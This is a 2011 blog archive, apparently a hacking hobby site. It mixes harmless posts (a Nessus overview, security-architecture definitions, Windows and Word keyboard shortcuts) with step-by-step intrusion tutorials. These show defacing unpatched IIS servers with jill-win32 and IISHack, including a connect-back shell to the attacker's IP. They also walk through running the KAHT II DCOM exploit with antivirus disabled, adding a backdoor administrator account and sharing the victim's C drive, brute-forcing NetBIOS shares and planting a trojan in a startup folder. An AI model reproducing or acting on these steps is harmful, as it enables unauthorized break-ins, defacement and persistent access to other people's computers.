Monday, 31 October 2011

Nessus Security Scanner

Nessus Security Scanner
According to the popular consensus, Nessus  is by far among the best choices of vulnerability scanners. What’s more, it’s part of the Gnu’s Not Unix (GNU) General
Public License (GPL) and can therefore be obtained and utilized at no charge.
The following are some of the features of Nessus:

Plugin Architecture
 Each security test is written as an external plugin. This
means that you can easily add your own tests without having to read the code
of the nessusd engine.

Nessus Attack Scripting Language.
Nessus Security Scanner includes Nessus
Attack Scripting Language (NASL), a language designed to write security tests
easily and quickly. (Security checks can also be written in the C programming
language.)

Up-to-Date Security Vulnerability Database. 
 Nessus focuses mostly on the
development of security checks for recent security holes.

Client/Server Architecture. 
Nessus Security Scanner is made up of two parts:
a server, which performs the attacks, and a client, which is the front end. You
can run the server and the client on different systems. That is, you can audit
your whole network from your personal computer, whereas the server performs
its attacks from the mainframe, which is “upstairs.” There are three clients: one
for X11, one for Win32, and one written in Java.

Test Capability on an Unlimited Number of Hosts Simultaneously
Depending on the power of the station on which you run the Nessus server, you can test 2,
10, or 40 hosts at the same time.

Smart Service Recognition. 
Nessus does not believe that target hosts will respect
the Internet Assigned Numbers Authority (IANA) port numbers. This means
that Nessus will recognize an FTP server running on a nonstandard port (say,
31337) or a Web server running on port 8080.

Multiples Services.
Imagine that you run two or more Web servers on your
host—one on port 80, the other on port 8080. Nessus will test the security of
both ports.

Cooperation Tests. 
The security tests performed by Nessus cooperate so that
nothing useless is made. If your FTP server does not offer anonymous logins,
then anonymous-related security checks will not be performed.

Cracker Behavior. 
Nessus does not trust that version x.y.z of a given software
is immune to a security problem. Ninety-five percent of the security checks will
actually perform their job, so you should try to overflow your buffers, relay
some mails, and even crash your computer!
Complete Reports. Nessus will not only tell you what’s wrong on your network,
but will, most of the time, tell you how to prevent crackers from exploiting the
security holes found and will give you the risk level, from low to very high, of
each problem found.
Exportable Reports. The Unix client can export Nessus reports as ASCII text,
LaTeX, HTML, “spiffy” HTML , and an easy-to-parse
file format.

Full SSL Support. Nessus has the capability to test Secure Socket Layer (SSL)-
ized services, such as HTTPs, SMTPs, and IMAPs. You can even supply Nessus
with a certificate so that it can integrate into a public key infrastructure (PKI).

Smart Plugins. Nessus will determine which plugins should or should
not be launched against the remote host . This option is called optimizations.
Nondestructive.  If you don’t want to risk bringing down services on
your network, you can enable the “safe checks” option of Nessus, which will
make Nessus rely on banners rather than exploit real flaws to determine
whether a vulnerability is present.
Read More »
Posted by RAJPUT HOSTEL at 10:29 pm 0 comments
Labels:

Security Architecture

Security Architecture
Security provided by IT Systems can be defined as the IT system’s ability to be able to protect confidentiality and integrity of processed data, as well as to be able to provide availability of the system and data.

“IT Architecture” may be defined as a set of design artifacts, that are relevant for describing an object such that it can be produced to requirements (quality) as well as maintained over the period of its useful life. The design artifact describe the structure of components, their inter-relationships, and the principles and guidelines governing their design and evolution over time.

Consequently the definition of “IT Security Architecture” may be considered as:

The design artifacts that describe how the security controls are positioned and how they relate to the overall IT Architecture. These controls serve the purpose to maintain the system’s quality attributes, among them confidentiality, integrity and availability.

Security qualities are often considered as Non-functional requirements when systems are designed. In other words they are not required for the system to meet its functional goals such as processing financial transactions, but are needed for a given level of assurance that the system will perform to meet the functional requirements that have been defined.

In recent years there has been a trend towards a hierarchy of control objectives, controls and specific technical implementations of controls, which are implemented within a given security architecture in order to meet the security requirements.
Read More »
Posted by RAJPUT HOSTEL at 10:14 pm 0 comments
Labels:

Server Hacking

IIS ( Web server/web page) hacking

IIS is Microsoft's internet server. It is very buggy and very exploitable. Defacing a IIS server is actually very easy. Alot of system administrators does not load patches on their IIS servers so they are the people who gets defaced (hacked). Current IIS servers I will show u to hack is IIS 4/5. IIS 6 is the industry standard at the moment, but there is still alot of IIS4/5 servers online. The way IIS server are being hacked is though buffer overflows and exploits. This is when a certain code is sent to the server, the server gets confused and grants you root access to the server. In the IIS hacking download section there is alot of IIS hacking tools making it easy for anyone to hack a IIS server. Not all webservers are run on IIS, there is many other webserver software out there like Apache. We will only be dealing with IIS servers.

Firstly you have to find a IIS server. Dreamscape IISscanner is very useful. It gives you the option to scan a certain IP or an IP range. It will search and tell you if it finds any IIS servers, and which version the host is running.. Another way is to telnet to the IP on port 80. In dos prompt (Start, Run,CMD) type in : telnet 196.35.45.21 80. It will open telnet and show you what IIS the host is running. Web servers normally runs on port 80, but it can be any other specified port.

If you find a IIS server, it's time to DEFACE it :) Go check on my IIS hacking page for IIS hacking programs. We will first use Jill-win32 for now. It exploits an IIS5 printer overflow. In dos prompt (Start, Run) run jill-win32. It will show you this :

iis5 remote .printer overflow.
dark spyrit < hack@me.org> / beavuh labs.
usage: jill-win32

An example how to use it :

jill-win32 196.65.56.32 80 196.89.65.45 69 - 196.65.56.32 is the IIS server you want to deface, port 80 is the port the server runs it IIS service on, 196.89.65.45. is your IP, and port 69 is the port TFPD32 (available from this zip file) will listen on. When you run jill-win32 it will exploit a printer overflow on the IIS server and create a backdoor on the server which will connect to port 69 on your PC, which TFPD32 listening on.

Here is a another example :

Download IISHack and do the following :

Usage: IISHack1.5 [server] [server-port] [trojan-port]

C:\send resume to hire@eeye.com> iishack1.5.exe www.[yourowncompany].com 80 6969
IISHack Version 1.5
eEye Digital Security
http://www.hackme.com
Code By: Ryan Permeh & Marc Maiffret
eEye Digital Security takes no responsibility for use of this code.
It is for educational purposes only.

Attempting to find an executable directory...
Trying directory [scripts]
Executable directory found. [scripts]
Path to executable directory is [C:\Inetpub\scripts]
Moving cmd.exe from winnt\system32 to C:\Inetpub\scripts.
Successfully moved cmd.exe to C:\Inetpub\scripts\eeyehack.exe
Sending the exploit...
Exploit sent! Now telnet to www.[yourowncompany].com on port 6969 and you should get a cmd prompt.
C:\> telnet www.[yourowncompany].com 6969
Trying www.[yourowncompany].com...
Microsoft(R) Windows NT(TM)


C:\WINNT\system32>whoami

NT AUTHORITY\SYSTEM
For those people who does not have a clue what's going on in here, go the script kiddie way and download the other GUI ( graphical user interface ) IIS hacking programs from my IIS page and let the program deface the web page for you. There is a few IIS tutorials in Windows hacker misc section.

Read More »
Posted by RAJPUT HOSTEL at 10:08 pm 0 comments
Labels:

MAC address

Getting a PC name, MAC address and user name logged on

So you would like to know someone's PC name, or their MAC address of their network card or the username that currently logged onto the PC? It can be very useful to have this info on someone. Their PC name can be their own name or company name. Their MAC address is the address of their network card, which is static, means that it can never change. Their username can also be useful if you would like to know this persons name. All of this can only be retrieved if the person has a network card installed on their PC.

In DOS prompt (Start, Run) type in " nbtstat -a IP"

EX : nbstat -a 196.35.24.15, it will show something like this :

Local Area Connection 3:
Node IpAddress: [10.10.10.22] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
PCNAME <00> UNIQUE Registered
DOMAINNAME<00> GROUP Registered
PCNAME<03> UNIQUE Registered
PCNAME<20> UNIQUE Registered
DOMAINNAME <1E> GROUP Registered
USERNAME <03> UNIQUE Registered

MAC Address = 00-22-AE-43-33-30

It will show you the PC name, domain name if it is connected to a domain and it will show the user name logged onto the PC. The MAC is static, meaning it never changes, useful for identifying someone. Your buddy attacks you, you check his IP and you do a "nbtstat" on him, and you gets his MAC address. So now if you check on his PC, and see he has got the same MAC address you know it was him attacking you.
Read More »
Posted by RAJPUT HOSTEL at 10:03 pm 0 comments
Labels:

Hacking a PC with a exploit

Hacking a PC with a exploit

What is a exploit? It's a poorly coded piece in software which you can use to gain access to the system. There is many exploits available for the various MS Windows's out there. Windows Hacker exploit download page which has compiled exploits.

Now if your a n00b, you don't know how to compile an exploit, basically you need some programming experience, so go learn how to program. Most exploits are written in C++ so try Bloodshed Dev C++ which you can use to compile exploits.

Read this tutorial about compiling exploits.

But you can download exploits which other people has already compiled. If someone updates their PC when new exploits comes out, you can't exploit them. but if they don't update and install new patches, the chance you can exploit and gain access to their PC is big.

Check this example of how a exploit works:

KAHT II - MASSIVE RPC EXPLOIT

This is a exploit for Win2k/XP and its already compiled, you can download it from the Windows Hacker exploits section.

This is an explanation of how to use it :

1. Get target IP, make sure it uses XP or 2k

2. Download exploit tool
(make sure to deactivate your AV)

3. Run exploit from cmd
C:\> kaht 192.168.1.100 192.168.1.101

note: 192.168.1.101 is the target
192.168.1.100 <-- 100 here is target - 1

4. If success, it will display as below
------------------------------------------------------------------------
KAHT II - MASSIVE RPC EXPLOIT
DCOM RPC exploit, Modified by At4r@wdesign.es
#haxorxitos && #localhost @efnet Ownz you!!!
Full VERSION AUTOHACKING
-------------------------------------------------------------------------

Targets : 192.168.1.100-192.168.1.101 eith 50 Threads
Attacking Port. Remote Shell At ports: 36388
Scan in Progress....
- Connecting to 192.168.1.101
Sending Exploit to a [win2k] Server....
- Connectando con la shell REmote...

Microsoft Windows 2000 [VErsion 5.00.2195]
Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

5. NOW.. YOU ARE IN TARGET DRIVE

6. Then you may add user
C:\WINNT\system32>net user myuser mypassword /add
^ ^
user name password

7. Group to admin
C:\WINNT\system32>net localgroup Administrators myuser /add
^ ^ ^
target group group user

8. Sharing drive
C:\WINNT\system32>net share c=c:

9. Exit from target.. dont forget!
C:\WINNT\system32>exit

10. Use share drive, run cmd
C:\>net use * \\192.168.1.101\drive_c * /u:myuser
Type the password for \\192.168.1.101\C: <--- enter myuser's password here

There you will now have a mapped drive to the target PC and an administrator account.
Read More »
Posted by RAJPUT HOSTEL at 9:59 pm 0 comments
Labels:

Hacking a PC through NetBios shares

Finding PCs with shares over a LAN or over internet is very easy. Choose a certain IP range and use Netscan to search through the IP range for PCs with shares. A PC can only have shares if it is connected to a network or has file and printing enabled, so mostly computers with an network card. If you find a computer with a share, use Windows to connect to that share.
Go START, RUN and type in "\\IP\sharename". Example "\\198.55.77.216\c" or with the PC name "\\pc1\c" - then you will have access to the share, to delete, copy or rename files or directories, depending what it was shared as, but most people share things with full access and no password. If you find a PC with shares, but when you try and connect to it, it ask you a password, the easy way to crack it is with PQWak, this program brute force cracks the password for you - Win9X only.

Windows NT/XP, works through permissions, so if something is shared, it is shared with permissions to the folder, and permissions is given to an user name. But alot of people make shares with full access to anyone. Win2K/XP accessing an share like the C$ share will ask you an username and password, if there is no password specified by the person who's PC it is.. Trying username as Administrator and password blank. Most people got administrator account password blank, easy way to get onto their shares.

Windows 2000 and XP you can use Venom or Starbrute to brute force or dictionary crack local accounts.

If you gain access to someone's hard drive, copy a trojan server file into their startup folder, and then when they reboot their PC, the trojan will run and you will have access to their PC with the trojan.
Read More »
Posted by RAJPUT HOSTEL at 9:55 pm 0 comments
Labels:

Tuesday, 21 June 2011

How to Create Run Commands

How to Create Your Own Customized Run Commands

Run commandThe Run command on Microsoft Windows operating system allows you to directly open an application or document with just a single command instead of navigating to it’s location and double-clicking the executable icon. However, it only works for some of the inbuilt Windows programs such as Command prompt (cmd), Calculator (calc) etc. So, have you ever wondered how to create your own customized Run commands for accessing your favorite programs, files and folders? Well, read on to find out the answer.
Creating the Customized Run Command


Let me take up an example of how to create a customized run command for opening the Internet explorer. Once you create this command, you should be able to open the Internet explorer just by typing “ie” (without quotes) in the Run dialog box. Here is how you can do that.

1. Right click on your Desktop and select New -> Shortcut.

2. You will see a “Create Shortcut” Dialog box as shown below

Create Shortcut

3. Click on “Browse”, navigate to: Program Files -> Internet Explorer from your Root drive (usually C:\) and select “iexplore” as shown in the above figure and click on “OK”.

4. Now click on “Next” and type any name for your shortcut. You can choose any name as per your choice; this will be your customized “Run command”. In this case I name my shortcut as “ie”. Click on “Finish”.

5. You will see a shortcut named “ie” on your desktop. All you need to do is just copy this shortcut and paste it in your Windows folder (usually “C:/Windows”). Once you have copied the shortcut onto your Windows folder, you can delete the one on your Desktop.

6. That’s it! From now on, just open the Run dialog box, type ie and hit Enter to open the Internet Explorer.

In this way you can create customized Run commands for any program of your choice. Say “ff” for Firefox, “ym” for Yahoo messenger, “wmp” for Windows media player and so on.

To do this, when you click on “Browse” in the Step-3, just select the target program’s main executable (.exe) file which will usually be located in the C:\Program Files folder. Give a simple and short name for this shortcut as per your choice and copy the shortcut file onto the Windows folder as usual. Now just type this short name in the Run dialog box to open the program.
Read More »
Posted by RAJPUT HOSTEL at 5:52 pm 1 comments
Labels:

Friday, 17 June 2011

REGEDIT Keyboard Shortcuts

REGEDIT Keyboard Shortcuts

Searching:
"Ctrl+F" -- Opens the Find dialog box.
"F3" -- Repeats the last search.

Browsing:
"Keypad +" -- Expands the selected branch.
"Keypad -" -- Collapses the selected branch.
"Keypad *" -- Expands all the selected branch's sub keys.
"Up Arrow" -- Selects the previous key.
"Down Arrow" -- Selects the next key.
"Left Arrow" -- Collapses the selected branch if it's not collapsed; otherwise, selects the parent key.
"Right Arrow" -- Expands the selected branch if it's not already expanded; otherwise, selects the key's first sub key.
"Home" -- Selects My Computer.
"End" -- Selects the last key that's visible in the key pane.
"Page Up" -- Moves up one page in the key pane.
"Page Down" -- Moves down one page in the key pane.
"Tab" -- Moves between the key and value panes.
"F6" -- Moves between the key and value panes.

Others:
"Delete" -- Deletes the select branch or value.
"F1" -- Opens Regedit's Help.
"F2" -- Renames the selected key or value.
"F5" -- Refreshes the key and value panes.
"F10" -- Opens Regedit's menu bar.
"Shift+F10" -- Opens the shortcut menu for the selected key or value.
"Alt+F4" -- Closes Regedit.
Read More »
Posted by RAJPUT HOSTEL at 1:46 pm 0 comments
Labels:

Microsoft(MS) Word Shorcut keys

Microsoft(MS) Word Shorcut keys
Keyboard Shortcut

Result in Microsoft Word

CTRL and A


Selects all in the current document.

CTRL and B


Bold text.

CTRL and C


Copies the item or text to the Clipboard and can be pasted using CTRL and V.

CTRL and D


Displays the Font dialogue box.

CTRL and E


Centre Alignment.

CTRL and F


Displays the Find dialog box, to search the current document.

CTRL and G


Displays the Go to dialog box, to go to a specific location in the current document.

CTRL and H


Displays the Replace dialogue box.

CTRL and I


Italic text.

CTRL and J


Full Justification.

CTRL and K


Create Hyperlink

CTRL and L


Left Alignment

CTRL and M


Tab

CTRL and N


Creates a new document.

CTRL and O


Displays the Open File dialogue box.

CTRL and P


Displays the Print dialog box.

CTRL and R


Right Alignment.

CTRL and S


Displays the Save dialog box.

CTRL and U


Underline text

CTRL and V


Pastes the copied item or text from the Clipboard into the current position in the document.

CTRL and X


Cuts the item or text selected to the Clipboard.

CTRL and Y


Redo the last undone action.

CTRL and Z


Undoes the last action.

CTRL and ENTER


Insert Page Break.

CTRL and F2


Show Print preview.

CTRL and F4


Closes the active document window.

CTRL and F6


Opens the next document window.
Keyboard Shortcut

Result in Microsoft Word

F1 key


Get help or use the Office assistant.

SHIFT and F1 Key


Context sensitive help.

F2 Key


Move text or image.

SHIFT and F2 Key


Copy Text.

F3 Key


Insert an auto text entry.

SHIFT and F3 Key


Change the case of the selected text.

F4 Key


Perform last action again.

SHIFT and F4 Key


Perform a Find or Go to action again.

F5 Key


Displays the Go to dialogue box, from here you can also Find and Replace.

SHIFT and F5 Key


Move to a previous revision.

F6 Key


Go to the next frame or pane.

SHIFT and F6 Key


Go to the previous frame or pane.

F7 Key


Launch the Spell checker.

SHIFT and F7 Key


Launch the Thesaurus.

F8 Key


Extend the current selection.

SHIFT and F8 Key


Shrink the current selection.

F9 Key


Update the selected fields.

SHIFT and F9 Key


Switch between a field code and it's result.

F10 Key


Activate the menu bar.

SHIFT and F10 Key


Display a Shortcut Menu. Same as right clicking.

F11 Key


Go to the next field.

SHIFT and F11 Key


Go to the previous field.

F12 Key


Save file As, equivalent to tools menu.

SHIFT and F12 Key


Save document, equivalent to tools menu.
Read More »
Posted by RAJPUT HOSTEL at 1:45 pm 0 comments
Labels: